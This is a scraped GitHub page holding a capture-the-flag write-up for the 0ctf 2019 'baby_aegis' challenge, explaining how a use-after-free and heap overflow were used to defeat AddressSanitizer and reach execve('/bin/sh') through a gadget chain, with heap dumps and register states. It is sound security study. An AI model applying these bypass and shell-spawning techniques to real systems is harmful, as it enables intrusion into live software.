<span>{{ refName }}</span>
<span>default</span>

</template>

<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame">
<div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading">
<svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" />
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" />
</svg>
</div>
</div>
<footer class="SelectMenu-footer">View all tags</footer>
</ref-selector>
</div>
</tab-container>
</input-demux>
</div>
</div>

</details>

</div>

<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay>
<modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade">
<header class="Overlay-header Overlay-header--large Overlay-header--divided">
<div class="Overlay-headerContentWrap">
<div class="Overlay-titleWrap">
<h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1>
</div>
<div class="Overlay-actionWrap">
<button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x">
<path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path>
</svg></button>
</div>
</div>
</header>
<div class="Overlay-body ">

<div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
</div>

</div>
<footer class="Overlay-footer Overlay-footer--alignEnd">
<button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel
</button>
<button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create
</button>
</footer>
</modal-dialog></div>

<div class="flex-1 mx-2 flex-self-center f4">
<div class="d-none d-sm-block">
<span><span><span>CTF</span></span></span><span>/</span><span><span>0ctf_2019</span></span><span>/</span>baby_aegis<span>/</span>
</div>
</div>

<div class="d-flex">

Go to file

</div>
</div>

<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF</span></span></span><span>/</span><span><span>0ctf_2019</span></span><span>/</span>baby_aegis<span>/</span></div>

<div class="Box mb-3" >
<div class="Box-header position-relative">
<h2 class="sr-only">Latest commit</h2>
<div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled>
<include-fragment src="/agadient/CTF/tree-commit/bec408be050277fe6d8272a53613f7b2424ef7fe/0ctf_2019/baby_aegis" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit">
<div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div>
<div class="Skeleton Skeleton--text col-5 ml-3"> </div>
</include-fragment> <div class="flex-shrink-0">
<h2 class="sr-only">Git stats</h2>


</div>
</div>
</div>
<h2 id="files" class="sr-only">Files</h2>

<include-fragment src="/agadient/CTF/file-list/master/0ctf_2019/baby_aegis">
Permalink

<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path>
</svg>
Failed to load latest commit information.


</div> <div class="js-details-container Details" data-hpc>
<div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block">
<div class="sr-only" role="row">
<div role="columnheader">Type</div>
<div role="columnheader">Name</div>
<div role="columnheader" class="d-none d-md-block">Latest commit message</div>
<div role="columnheader">Commit time</div>
</div>
<div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" >
<div role="rowheader" class="flex-auto min-width-0 col-md-2">

<span>. .</span>
 </div>
<div role="gridcell" class="d-none d-md-block"></div>
<div role="gridcell"></div>
</div>

<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item ">
<div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;">
<svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted">
<path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path>
</svg>
</div>

<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3">
<span>README</span>
</div>

<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" >
<div class="Skeleton Skeleton--text col-7"> </div>
</div>

<div role="gridcell" class="color-fg-muted text-right" style="width:100px;">
<div class="Skeleton Skeleton--text"> </div>
</div>

</div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item ">
<div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;">
<svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted">
<path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path>
</svg>
</div>

<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3">
<span>aegis.zip</span>
</div>

<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" >
<div class="Skeleton Skeleton--text col-7"> </div>
</div>

<div role="gridcell" class="color-fg-muted text-right" style="width:100px;">
<div class="Skeleton Skeleton--text"> </div>
</div>

</div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item ">
<div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;">
<svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted">
<path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path>
</svg>
</div>

<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3">
<span>aegis_exploit.py</span>
</div>

<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" >
<div class="Skeleton Skeleton--text col-7"> </div>
</div>

<div role="gridcell" class="color-fg-muted text-right" style="width:100px;">
<div class="Skeleton Skeleton--text"> </div>
</div>

</div>
</div>
</div>

</include-fragment>

</div>



<div id="readme" class="Box js-code-block-container js-code-nav-container js-tagsearch-file Box--responsive"
data-tagsearch-path="0ctf_2019/baby_aegis/README"
data-tagsearch-lang="">

<div class="d-flex Box-header border-bottom-0 flex-items-center flex-justify-between color-bg-default rounded-top-2" >
<div class="d-flex flex-items-center">
<h2 class="Box-title">
README
</h2>
</div>
</div>

<div data-target="readme-toc.content" class="Box-body ">
<div class="plain">

I want to give a shoutout to ghostly_grey for working with me to solve this chal. It was definitely
a team effort and I don't know if either of us could have done it alone!



Now, the writeup. For this challenge, we are given a binary and libc. 
The binary has the following protections:



[*] '/home/a/Desktop/0ctf_2019/aegis/aegis'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled
    ASAN:     Enabled
    UBSAN:    Enabled



Okay so besides the normal protections, the binary is protected by Address Sanitizer!! 
Getting past this defense is by far the most difficult part of the challenge.



From reversing the binary, we see that this is a standard heap challenge. You can create a note,
update a note, delete a note, show a note, and exit. The notes are stored in a global array, and you 
can only allocate a maximum of 10.



  ___   ____ _____ _____ _______ ____ _____ _____   ____   ___  _  ___
 / _ \ / ___|_   _|  ___/ /_   _/ ___|_   _|  ___| |___ \ / _ \/ |/ _ \
| | | | |     | | | |_ / /  | || |     | | | |_      __) | | | | | (_) |
| |_| | |___  | | |  _/ /   | || |___  | | |  _|    / __/| |_| | |\__, |
 \___/ \____| |_| |_|/_/    |_| \____| |_| |_|     |_____|\___/|_|  /_/



======Protected Notebook======
1. Add note
2. Show note
3. Update note
4. Delete note
5. Exit
Choice:



There is another function, secret, which allows you to write a nullbyte anywhere into memory. 
You can only use this function once and it can be accessed by putting the number "666" in the menu. 
It will prove essential for our exploit, but more on that later.



The first vulnerability that we found was a simple UAF. In the delete function,
the note pointers are never nulled out like they should be. This allows us
to access these pointers and overwrite data that has already been freed.



==4316==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000000010 at pc 0x555555668553 bp 0x7fffffffe310 sp 0x7fffffffe308
READ of size 8 at 0x602000000010 thread T0
    #0 0x555555668552  (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114552)
    #1 0x555555668a6c  (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114a6c)
    #2 0x7ffff6e24b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #3 0x55555556f8e9  (/home/a/Desktop/0ctf_2019/aegis/aegis+0x1b8e9)



0x602000000010 is located 0 bytes inside of 16-byte region [0x602000000010,0x602000000020)
freed by thread T0 here:
    #0 0x55555562f5f0  (/home/a/Desktop/0ctf_2019/aegis/aegis+0xdb5f0)
    #1 0x5555556688be  (/home/a/Desktop/0ctf_2019/aegis/aegis+0x1148be)
    #2 0x555555668a7a  (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114a7a)
    #3 0x7ffff6e24b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)



previously allocated by thread T0 here:
    #0 0x55555562f7c0  (/home/a/Desktop/0ctf_2019/aegis/aegis+0xdb7c0)
    #1 0x555555668375  (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114375)
    #2 0x555555668a65  (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114a65)
    #3 0x7ffff6e24b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)



SUMMARY: AddressSanitizer: heap-use-after-free (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114552)
Shadow bytes around the buggy address:
  0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa[fd]fd fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==4316==ABORTING



In order to attack this vulnerability, you need to null out the byte that ASAN has poisoned.
In the above example, it is 0x0c047fff8002. ASAN does NOT use ASLR, so we can determine the address
of the poison byte we want to NULL out by either looking at the ASAN output, or doing a simple computation



ShadowAddr = (Addr >> 3) + Offset.



You can read more about ASAN at these two links:
https://www.usenix.org/system/files/conference/atc12/atc12-final39.pdf
https://github.com/google/sanitizers/wiki/AddressSanitizer



It turns out, this UAF is not very useful to us. Why? Well, let's take a look at ASAN's Heap:



ASAN Heap snapshot 1 (Before Free):
00:0000│   0x602000000000 ◂— 0x2ffffff00000002
01:0008│   0x602000000008 ◂— 0x2080000120000010
02:0010│   0x602000000010 —▸ 0x60b0000000f0 ◂— 0x6161616161616161 ('aaaaaaaa')
03:0018│   0x602000000018 —▸ 0x555555668ab0 (cfi_check) ◂— jmp    0x555555667d10
04:0020│   0x602000000020 ◂— 0x0



ASAN Heap snapshot (After Free):
00:0000│   0x602000000000 ◂— 0x200000000000003
01:0008│   0x602000000008 ◂— 0x2080000120000010
02:0010│   0x602000000010 —▸ 0x60b061000001 ◂— 0x0
03:0018│   0x602000000018 —▸ 0x555555668ab0 (cfi_check) ◂— jmp    0x555555667d10
04:0020│   0x602000000020 ◂— 0x0



In this example, we've allocated a note of size 100. The pointer in the global Notes array will be 
0x602000000010. This address simply contains a pointer to the note's data. 
However, you can see that after the free, this pointer become mangled!
Thus, we are unable to reuse this dangling pointer to our advantage as the program will just segfault.



After this revelation, we continued to look for more vulnerabilities. It turns out, there is also a heap
buffer overflow in the update function. The update function uses strlen to read in new content, but it adds a byte
to the amount of data that can be read in. Thus, if we do multiple successive updates, we can gradually overflow an 
object.



What can we actually attack with this overflow? Well, if we are clever about the size of our notes,
the content chunks will be place on the same page as the chunks which contain pointers to the note content.
For example, when we allocate a chunk of size 16, ASAN's heap will look like this:



00:0000│   0x602000000000 ◂— 0x2ffffff00000002
01:0008│   0x602000000008 ◂— 0x900000120000010
02:0010│   0x602000000010 —▸ 0xa0061616161 ◂— 0x0
03:0018│   0x602000000018 ◂— 0xbebebe0000000000
04:0020│   0x602000000020 ◂— 0x2ffffff00000002
05:0028│   0x602000000028 ◂— 0x2080000120000010
06:0030│   0x602000000030 —▸ 0x602000000010 —▸ 0xa0061616161 ◂— 0x0
07:0038│   0x602000000038 —▸ 0x555555668ab0 (cfi_check) ◂— jmp    0x555555667d10



In this example, the chunk's content begins at 0x602000000010 and the chunk which contains a data
pointer begins at 0x602000000020.



So, by using multiple updates to the same note, we can achieve an overflow of arbitrary length.
However, we run into a problem. The addresses 0x602000000020 and 0x602000000028 have been poisoned
by ASAN. Thus, if we want to write into one of them, we need to use the secret function and it's
one byte null overwrite. We only get to do this once, however, so we have no chance of directly
making it to the data pointer located at 0x602000000030 because there are two poisoned addresses
between our content and the pointer.



So, all we can attack with this overflow is the chunk's metadata. So what to they bytes located at 
0x602000000020 and 0x2080000120000010 actually mean? Well, let's take a look at the ASAN allocator's
source code located here:



https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_allocator.cc



I've pulled out two of the most important code sections for our purposes.



// The memory chunk allocated from the underlying allocator looks like this:
// L L L L L L H H U U U U U U R R
//   L -- left redzone words (0 or more bytes)
//   H -- ChunkHeader (16 bytes), which is also a part of the left redzone.
//   U -- user memory.
//   R -- right redzone (0 or more bytes)
// ChunkBase consists of ChunkHeader and other bytes that overlap with user
// memory.



// If the left redzone is greater than the ChunkHeader size we store a magic
// value in the first uptr word of the memory block and store the address of
// ChunkBase in the next uptr.
// M B L L L L L L L L L  H H U U U U U U
//   |                    ^
//   ---------------------|
//   M -- magic value kAllocBegMagic
//   B -- address of ChunkHeader pointing to the first 'H'
static const uptr kAllocBegMagic = 0xCC6E96B9;



struct ChunkHeader {
  // 1-st 8 bytes.
  u32 chunk_state       : 8;  // Must be first.
  u32 alloc_tid         : 24;



  u32 free_tid          : 24;
  u32 from_memalign     : 1;
  u32 alloc_type        : 2;
  u32 rz_log            : 3;
  u32 lsan_tag          : 2;
  // 2-nd 8 bytes
  // This field is used for small sizes. For large sizes it is equal to
  // SizeClassMap::kMaxSize and the actual size is stored in the
  // SecondaryAllocator's metadata.
  u32 user_requested_size : 29;
  // align < 8 -> 0
  // else      -> log2(min(align, 512)) - 2
  u32 user_requested_alignment_log : 3;
  u32 alloc_context_id;
};



// Every chunk of memory allocated by this allocator can be in one of 3 states:
// CHUNK_AVAILABLE: the chunk is in the free list and ready to be allocated.
// CHUNK_ALLOCATED: the chunk is allocated and not yet freed.
// CHUNK_QUARANTINE: the chunk was freed and put into quarantine zone.
enum {
  CHUNK_AVAILABLE  = 0,  // 0 is the default value even if we didn't set it.
  CHUNK_ALLOCATED  = 2,
  CHUNK_QUARANTINE = 3
};



Okay, so we see that the first 29 bits of the data located at 0x602000000028 represent the 
chunks length. Also, the first 8 bits of the metadata determine whether the chunk is 
available, allocated, or in quarantine.



Before we continue, we have to go over a very important concept of ASAN's allocator. The allocator
is not designed to be hyper efficient, but to find bugs. Thus, it will try to avoid allocating
valid memory over freed memory at all costs so it can catch bugs like UAF. It does this by
putting free chunks into quarantine. Quarantined chunks are only reused after a certain amount
of memory has been freed. The standard setting is quarantine_size_mb=256M which can be seen
if you set the environment variable export ASAN_OPTIONS=verbosity=1. Thus, we need to free
a HUGE amount of memory before it gets reused. 



How do we do this with only 10 chunks with a maximum size of 1024? Answer: overwrite the size
of the victim chunk with a HUGE number. From our experience, 0xffffff should do it.



Now we're cookin'. By overwriting the size of the next chunk with a huge number and 
setting the other metadata bytes properly, we can get a huge chunk of memory to be recycled.
Thus, if we allocate some notes in this memory, we should be able to attack the UAF
we discovered before and gain arbitrary read write across the process's address space.



You might be wondering, how can we overwrite the size of the data located at 0x602000000028?
Isn't it also poisoned? Answer: ASAN does not protect against non-qword aligned overwrite. Basically,
we would have to write the address 0x602000000030 before ASAN would notice the overflow, since we nulled
out the previous byte in shadow memory with the secret function.



Once we are able to set the data pointer of the first chunk we allocated, we can read and write the process
address space as we please. However, the challenge isn't over. There is a check in the update
function that ensures your data pointer is located in ASAN's heap



 if ( *(_QWORD *)data_pointer >> 44 != 6LL )
 
 Thus, we only get one write for our exploit to work. Another problem is that the stack
 if full of junk and the only one_gadgets we have are these:
 
 0x4f2c5	execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL



0x4f322	execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL



0x10a38c	execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL



It is also very difficult to find a target which will be executed between our memory write and the call to 
error() where $RCX is null.



So, where can we write? Looking through the disassembly of the functions



_asan_handle_no_return
_ubsan_handle_cfi_check_fail_abort



we see there is a call to  __sanitizer::Die().



In this function, there is the code snippet:



  if ( __sanitizer::UserDieCallback )
    __sanitizer::UserDieCallback(this);
  v2 = &__sanitizer::InternalDieCallbacks;
  
 Thus, if there are any UserDieCallbacks registered, they will be executed.
 If we put one_gadget here, we will get the same issue. The stack is too full
 of junk for the rsp+X constraints to be passed.
 
 Looking at the registers when our gadget is called, we have the following state:
 
 ────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────────
 RAX  0x7ffff6ea0f05 (strsignal+165) ◂— mov    rax, rbp
 RBX  0x555556504880 —▸ 0x5555556388b0 (__sanitizer::SuppressionContext::GetMatched(__sanitizer::InternalMmapVector<__sanitizer::Suppression*>*)+352) ◂— push   rbp
 RCX  0x7fffffffe0a0 —▸ 0x7fffffffe150 ◂— 0x3d3d343300000003
 RDX  0x7fffffffe0a0 —▸ 0x7fffffffe150 ◂— 0x3d3d343300000003
 RDI  0x7fffffffe101 ◂— 0x100007fffffffe3
 RSI  0x0
 R8   0x6a6cb03abcebc041
 R9   0x0
 R10  0x0
 R11  0x206
 R12  0x55555556f8c0 (ptrace+7344) ◂— xor    ebp, ebp
 R13  0x7fffffffe460 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x555556504878 ◂— 0x0
 RSP  0x7fffffffe2e0 ◂— 0x1
 RIP  0x555555656148 ◂— call   rax
 
 We also control the value at offset 8 in the stack shown below.
 
00:0000│ rsp  0x7fffffffe2e0 ◂— 0x1
01:0008│      0x7fffffffe2e8 —▸ 0x7ffff6f0d398 (exec_comm+2520) ◂— lea    rdi, [rip + 0xa9afb]
02:0010│      0x7fffffffe2f0 —▸ 0x7fffffffe320 —▸ 0x7fffffffe360 —▸ 0x7fffffffe380 —▸ 0x555555668ac0 ◂— ...
03:0018│      0x7fffffffe2f8 —▸ 0x555555667959 ◂— sub    rsp, 8
04:0020│      0x7fffffffe300 ◂— 0x1
05:0028│      0x7fffffffe308 —▸ 0x55555566877e ◂— mov    edi, dword ptr [rbp - 0x14]
06:0030│      0x7fffffffe310 —▸ 0x7fffffffe320 —▸ 0x7fffffffe360 —▸ 0x7fffffffe380 —▸ 0x555555668ac0 ◂— ...
07:0038│      0x7fffffffe318 —▸ 0x7fffffffe360 —▸ 0x7fffffffe380 —▸ 0x555555668ac0 ◂— push   r15



So, RSI is already NULL and we need to set RDI to "/bin/sh" and RDX to NULL or environ for our exploit to work.
Looking at the following one_gadget code



0x7ffff6f0d393 <exec_comm+2515>:     lea    rsi,[rsp+0x70]
0x7ffff6f0d398 <exec_comm+2520>:     lea    rdi,[rip+0xa9afb]        # 0x7ffff6fb6e9a
0x7ffff6f0d39f <exec_comm+2527>:     mov    rdx,QWORD PTR [rax]
0x7ffff6f0d3a2 <exec_comm+2530>:     call   0x7ffff6ee7e30 <execve>



we see that it is possible to set rdx and rdi without changing rsi before execve is called.
However, this requires setting the correct value in rax. rax must point to NULL, and the only
other register that does this in the current state is rbp. Looking for a gadget in libc, we find



0x000000000009df05 : mov rax, rbp ; pop rbx ; pop rbp ; ret



This will set rax to rbp which points to NULL, pop twice, and return to the address on the stack which 
we control!



Thus, if we call this gadget using the UserDieCallback
and we only use the part of the one_gadget starting at 0x7ffff6f0d39f, we can 
call execve("/bin/sh", NULL, NULL)



Success!!! This will give us our shell and our flag!
flag{ASan_and_CFI_absolute_defense}



Overall this challenge was definitely tough. I'd like to thank the CTF
organizers for creating such a great challenge, it was very fun to pwn!
</div>
</div>
</div>

</div>

</div>

</div>

</turbo-frame>

</main>
</div>

</div>

<footer class="footer width-full container-xl p-responsive" role="contentinfo">
<h2 class='sr-only'>Footer</h2>

<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6">
<div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0">
<div class="mt-2 mt-lg-0 d-flex flex-items-center">

<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github">
<path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path>
</svg>
 <span>
© 2023 GitHub, Inc.
</span>
</div>
</div>

<nav aria-label='footer' class="col-12 col-lg-8">
<h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3>


</nav>
</div>

<div class="d-flex flex-justify-center pb-6">
<span></span>
</div>
</footer>

<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path>
</svg>
<button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x">
<path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path>
</svg>
</button>
You can’t perform that action at this time.
</div>

<div class="js-stale-session-flash flash flash-warn flash-banner" hidden
>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path>
</svg>
<span>You signed in with another tab or window. Reload to refresh your session.</span>
<span>You signed out in another tab or window. Reload to refresh your session.</span>
</div>
<template id="site-details-dialog">
<details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open>
<summary role="button" aria-label="Close dialog"></summary>
<details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal">
<button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x">
<path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path>
</svg>
</button>
<div class="octocat-spinner my-6 js-details-dialog-spinner"></div>
</details-dialog>
</details>
</template>

<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0">
<div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;">
</div>
</div>

<template id="snippet-clipboard-copy-button">
<div class="zeroclipboard-container position-absolute right-0 top-0">
<clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2">
